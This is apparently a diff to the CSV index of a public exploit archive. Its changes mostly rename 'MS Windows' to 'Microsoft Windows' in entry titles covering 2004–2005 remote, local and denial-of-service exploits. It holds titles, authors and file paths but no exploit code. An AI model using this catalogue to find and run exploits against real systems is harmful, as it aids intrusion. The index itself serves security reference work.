 331,platforms/linux/local/331.c,"LibXt XtAppInitialize() overflow *xterm exploit",1997-05-14,"Ming Zhang",linux,local,0
 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0
@@ -322,12 +322,12 @@ id,file,description,date,author,platform,type,port
 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow Exploit",2002-05-14,Teso,linux,remote,0
 348,platforms/linux/remote/348.c,"wu-ftpd <= 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21
 349,platforms/multiple/remote/349.txt,"SSH (x2) Remote Root Exploit",2002-05-01,Teso,multiple,remote,22
-350,platforms/windows/local/350.c,"MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
-351,platforms/windows/local/351.c,"MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0
-352,platforms/windows/local/352.c,"MS Windows 2000 Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0
-353,platforms/windows/local/353.c,"MS Windows 2K/XP Task Scheduler .job Exploit (MS04-022)",2004-07-18,N/A,windows,local,0
+350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
+351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0
+352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0
+353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,N/A,windows,local,0
 354,platforms/windows/dos/354.html,"MS Internet Explorer Overly Trusted Location Cache Exploit",2004-07-18,N/A,windows,dos,0
-355,platforms/windows/local/355.c,"MS Windows 2k Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0
+355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0
 356,platforms/windows/dos/356.c,"OverByte ICS FTP Server Remote Denial of Service Exploit",2004-07-20,ATmaCA,windows,dos,0
 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow Vulnerability",2004-07-20,"Luigi Auriemma",windows,dos,0
 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers Denial of Service Vulnerability",2004-07-22,"Peter Kruse",hardware,dos,0
@@ -338,9 +338,9 @@ id,file,description,date,author,platform,type,port
 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service Vulnerability",2004-07-22,"Seth Alan Woolley",hardware,dos,0
 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901
 365,platforms/windows/dos/365.html,"MS Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0
-366,platforms/windows/dos/366.pl,"MS Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0
+366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0
 367,platforms/osx/local/367.txt,"Mac OS X Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0
-368,platforms/windows/local/368.c,"MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
+368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
 369,platforms/linux/local/369.pl,"SoX Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0
 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0
 371,platforms/linux/dos/371.c,"Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)",2004-08-02,N/A,linux,dos,0
@@ -414,18 +414,18 @@ id,file,description,date,author,platform,type,port
 469,platforms/linux/local/469.c,"CDRecord's ReadCD Local Root Privileges",2004-09-19,"Max Vozeler",linux,local,0
 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0
 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66
-472,platforms/windows/remote/472.c,"MS Windows JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0
+472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0
 473,platforms/windows/remote/473.c,"MDaemon 6.5.1 IMAP/SMTP Remote Buffer Overflow Exploit",2004-09-22,D_BuG,windows,remote,143
-474,platforms/windows/dos/474.sh,"MS Windows JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0
-475,platforms/windows/remote/475.sh,"MS Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0
+474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0
+475,platforms/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0
 476,platforms/linux/local/476.c,"glFTPd Local Stack Overflow Exploit (PoC) (Slackware 9.0/9.1/10.0)",2004-09-23,CoKi,linux,local,0
 477,platforms/windows/dos/477.c,"PopMessenger <= 1.60 Remote Denial of Service Exploit",2004-09-23,"Luigi Auriemma",windows,dos,8473
-478,platforms/windows/remote/478.c,"MS Windows JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028)",2004-09-25,ATmaCA,windows,remote,0
+478,platforms/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028)",2004-09-25,ATmaCA,windows,remote,0
 479,platforms/linux/local/479.c,"GNU Sharutils <= 4.2.1 - Local Format String PoC Exploit",2004-09-25,n4rk0tix,linux,local,0
-480,platforms/windows/remote/480.c,"MS Windows JPEG GDI+ Remote Heap Overflow Exploit (MS04-028)",2004-09-25,"John Bissell",windows,remote,0
+480,platforms/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow Exploit (MS04-028)",2004-09-25,"John Bissell",windows,remote,0
 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 swxxx Local Root Shell Exploit",2002-12-11,watercloud,hp-ux,local,0
 551,platforms/linux/dos/551.c,"MyServer 0.7.1 (POST) Denial of Service Exploit",2004-09-27,"Tom Ferris",linux,dos,0
-556,platforms/windows/remote/556.c,"MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0
+556,platforms/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0
 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow Exploit",2004-09-28,ATmaCA,windows,local,0
 559,platforms/windows/local/559.c,"Zinf 2.2.1 - Local Buffer Overflow Exploit",2004-09-28,Delikon,windows,local,0
 560,platforms/windows/local/560.txt,"GlobalSCAPE - CuteFTP macros (.mcr) - Local Vulnerability",2004-09-28,ATmaCA,windows,local,0
@@ -440,14 +440,14 @@ id,file,description,date,author,platform,type,port
 573,platforms/windows/remote/573.c,"Icecast <= 2.0.1 Win32 Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000
 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0
 577,platforms/windows/remote/577.c,"YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit",2004-10-15,class101,windows,remote,25
-578,platforms/windows/dos/578.pl,"MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0
+578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0
 579,platforms/bsd/local/579.sh,"BSD bmon <= 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
 580,platforms/linux/remote/580.c,"Monit <= 4.2 Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812
 581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
 582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25
 583,platforms/windows/remote/583.pl,"SLX Server 6.1 Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
-584,platforms/windows/remote/584.c,"MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
-585,platforms/windows/dos/585.pl,"MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0
+584,platforms/windows/remote/584.c,"Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
+585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0
 586,platforms/linux/local/586.c,"BitchX 1.0c19 Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0
 587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0
 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
@@ -490,7 +490,7 @@ id,file,description,date,author,platform,type,port
 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80
 637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
-640,platforms/windows/remote/640.c,"MS Windows Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
+640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
 641,platforms/windows/remote/641.txt,"MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0
 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0
 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
@@ -559,13 +559,13 @@ id,file,description,date,author,platform,type,port
 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
 719,platforms/windows/remote/719.txt,"MS Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,N/A,php,webapps,0
-721,platforms/windows/dos/721.html,"MS Windows Kernel ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0
+721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0
 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,N/A,php,webapps,0
 726,platforms/windows/remote/726.c,"Netcat v1.1 - ""-e"" Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0
 729,platforms/windows/remote/729.txt,"PHP <= 4.3.7 openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80
 730,platforms/windows/remote/730.html,"MS Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0
-733,platforms/windows/remote/733.c,"MS Windows 2000 WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42
-734,platforms/windows/remote/734.c,"MS Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139
+733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42
+734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139
 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000
 737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal Vulnerability",2005-01-04,Madelman,php,webapps,0
 738,platforms/php/webapps/738.c,"iWebNegar Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,webapps,0
@@ -577,7 +577,7 @@ id,file,description,date,author,platform,type,port
 744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 uselib() Privilege Elevation",2005-01-07,"Paul Starzetz",linux,local,0
 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
-749,platforms/windows/local/749.cpp,"MS Windows Improper Token Validation Local Exploit (working)",2005-01-11,"Cesar Cerrudo",windows,local,0
+749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101
 753,platforms/windows/remote/753.html,"MS Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0
 754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0
@@ -681,7 +681,7 @@ id,file,description,date,author,platform,type,port
 858,platforms/php/webapps/858.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0
 859,platforms/windows/remote/859.c,"CA License Server (GETCONFIG) Remote Buffer Overflow Exploit (c)",2005-03-06,class101,windows,remote,10203
 860,platforms/php/webapps/860.c,"Aztek Forum <= 4.0 [myadmin.php] Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0
-861,platforms/windows/dos/861.c,"MS Windows XP/2003 Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0
+861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0
 862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0
 863,platforms/windows/local/863.cpp,"RealPlayer 10 "".smil"" File Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0
 864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0
@@ -728,7 +728,7 @@ id,file,description,date,author,platform,type,port
 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x- Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031
 907,platforms/php/webapps/907.pl,"phpBB <= 2.0.13 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0
 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server <= 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0
-909,platforms/windows/remote/909.cpp,"MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)",2005-04-12,class101,windows,remote,42
+909,platforms/windows/remote/909.cpp,"Microsoft Windows - (WINS) Remote Buffer Overflow Exploit (3)",2005-04-12,class101,windows,remote,42
 910,platforms/php/webapps/910.pl,"phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0
 911,platforms/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service Exploit",2005-04-04,"Daniel McNeil",linux,dos,0
 912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local Exploit",2005-04-04,Kozan,windows,local,0
@@ -756,11 +756,11 @@ id,file,description,date,author,platform,type,port
 935,platforms/windows/local/935.c,"Morpheus <= 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0
 936,platforms/windows/local/936.c,"DeluxeFtp 6.x Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0
 937,platforms/windows/local/937.c,"BitComet 0.57 Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0
-938,platforms/windows/local/938.cpp,"MS Windows (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0
+938,platforms/windows/local/938.cpp,"Microsoft Windows - (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0
 939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 exit.php SQL Injection Exploit",2005-04-13,kre0n,php,webapps,0
 940,platforms/linux/remote/940.c,"Sumus 0.2.2 httpd Remote Buffer Overflow Exploit",2005-04-14,vade79,linux,remote,81
 941,platforms/windows/dos/941.c,"Yager <= 5.24 Multiple Denial of Service Exploit",2005-04-14,"Luigi Auriemma",windows,dos,0
-942,platforms/windows/dos/942.c,"MS Windows Malformed IP Options DoS Exploit (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0
+942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options DoS Exploit (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0
 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution Exploit",2005-04-18,"Michael Krax",windows,remote,0
 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0
 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server (GET Request) Remote BoF Exploit",2005-04-24,cybertronic,windows,remote,80
@@ -792,7 +792,7 @@ id,file,description,date,author,platform,type,port
 973,platforms/linux/local/973.c,"ARPUS/Ce Local File Overwrite Exploit (setuid)",2005-05-01,"Kevin Finisterre",linux,local,0
 974,platforms/linux/local/974.pl,"ARPUS/Ce Local Overflow Exploit (setuid) (perl)",2005-05-01,"Kevin Finisterre",linux,local,0
 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow Exploit",2005-05-01,muts,windows,remote,21
-976,platforms/windows/remote/976.cpp,"MS Windows WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
+976,platforms/windows/remote/976.cpp,"Microsoft Windows WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
 977,platforms/hp-ux/remote/977.c,"HP-UX FTPD <= 1.1.214.4 ""REST"" Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
 978,platforms/windows/dos/978.cpp,"Ashley's Web Server Denial of Service Exploit",2005-05-04,basher13,windows,dos,0
 979,platforms/windows/remote/979.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit",2005-05-04,Mouse,windows,remote,0
@@ -810,7 +810,7 @@ id,file,description,date,author,platform,type,port
 997,platforms/linux/local/997.sh,"Linux Mandrake <= 10.2 - cdrdao Local Root Exploit (unfixed)",2005-05-17,newbug,linux,local,0
 998,platforms/linux/dos/998.c,"Linux Kernel <= 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0
 999,platforms/linux/dos/999.c,"Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0
-1000,platforms/windows/dos/1000.cpp,"MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0
+1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0
 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0
 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0
 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0
@@ -828,7 +828,7 @@ id,file,description,date,author,platform,type,port
 1016,platforms/php/webapps/1016.pl,"phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (perl)",2005-05-30,Alpha_Programmer,php,webapps,0
 1017,platforms/php/webapps/1017.php,"phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php)",2005-05-30,mh_p0rtal,php,webapps,0
 1018,platforms/php/webapps/1018.php,"phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php 2)",2005-05-30,Nikyt0x,php,webapps,0
-1019,platforms/windows/local/1019.c,"MS Windows COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0
+1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0
 1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0
 1021,platforms/linux/remote/1021.c,"Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0
 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0
@@ -872,7 +872,7 @@ id,file,description,date,author,platform,type,port
 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0
 1063,platforms/php/webapps/1063.pl,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)",2005-06-22,g30rg3_x,php,webapps,0
 1064,platforms/php/webapps/1064.c,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)",2005-06-22,HaCkZaTaN,php,webapps,0
-1065,platforms/windows/dos/1065.c,"MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0
+1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0
 1066,platforms/windows/remote/1066.cpp,"MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0
 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0
 1068,platforms/php/webapps/1068.pl,"PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0
@@ -882,7 +882,7 @@ id,file,description,date,author,platform,type,port
 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped Denial of Service Attack (win version)",2005-06-27,"Marco Del Percio",multiple,dos,0
 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
-1075,platforms/windows/remote/1075.c,"MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
+1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0
 1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0
 1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0
@@ -910,7 +910,7 @@ id,file,description,date,author,platform,type,port
 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service Exploit",2005-07-12,Kozan,windows,dos,0
 1102,platforms/windows/remote/1102.html,"Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0
 1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0
-1104,platforms/windows/dos/1104.cpp,"MS Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0
+1104,platforms/windows/dos/1104.cpp,"Microsoft Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0
 1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0
 1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0
 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0
@@ -922,7 +922,7 @@ id,file,description,date,author,platform,type,port
 1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit)",2005-07-19,str0ke,php,webapps,0
 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555
 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0
-1116,platforms/windows/dos/1116.c,"MS Windows Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0
+1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0
 1118,platforms/windows/remote/1118.c,"SlimFTPd <= 3.16 Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21
 1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0
 1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0
@@ -931,7 +931,7 @@ id,file,description,date,author,platform,type,port
 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143
 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0
 1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0
-1128,platforms/windows/local/1128.c,"MS Windows (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0
+1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0
 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0
 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070
 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523
@@ -944,12 +944,12 @@ id,file,description,date,author,platform,type,port
 1139,platforms/linux/remote/1139.c,"Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0
 1140,platforms/php/webapps/1140.php,"Flatnuke <= 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0
 1142,platforms/php/webapps/1142.php,"Wordpress <= 1.5.1.3 - Remote Code Execution 0Day",2005-08-09,Kartoffelguru,php,webapps,0
-1143,platforms/windows/dos/1143.sys,"MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0
